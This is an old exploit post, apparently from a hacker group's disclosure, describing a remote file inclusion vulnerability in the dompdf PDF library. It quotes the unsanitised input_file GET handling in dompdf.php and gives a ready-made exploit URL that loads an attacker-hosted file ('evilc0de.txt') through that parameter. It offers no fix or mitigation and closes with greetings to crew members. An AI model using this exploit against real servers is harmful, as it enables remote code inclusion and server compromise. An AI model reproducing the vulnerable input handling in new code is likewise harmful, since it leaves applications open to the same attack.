================================== apps dompdf RFI Vulnerability ================================== ==================================================== [x] ExpL0it TitLe : apps dompdf RFI Vulnerability [x] DatE : 01 September 2010 [x] AutH0r : Andre_Corleone [x] Software Link : www.digitaljunkies.ca/dompdf/ [x] h0mE : http://tecon-crew.org [x] TestEd 0n : linux ubuntu 10.04 [x] d0rK : :P ==================================================== ========================================================================================== [x]bug heRe: if ( isset($_GET["input_file"]) ) $file = rawurldecode($_GET["input_file"]); else throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable)."); ========================================================================================== ================================================================== [x]expL0iT: http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?] ================================================================== ============================================================================================ [x]th4nKs t0: ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you ============================================================================================ ===================== [x]Jakarta,Indonesia =====================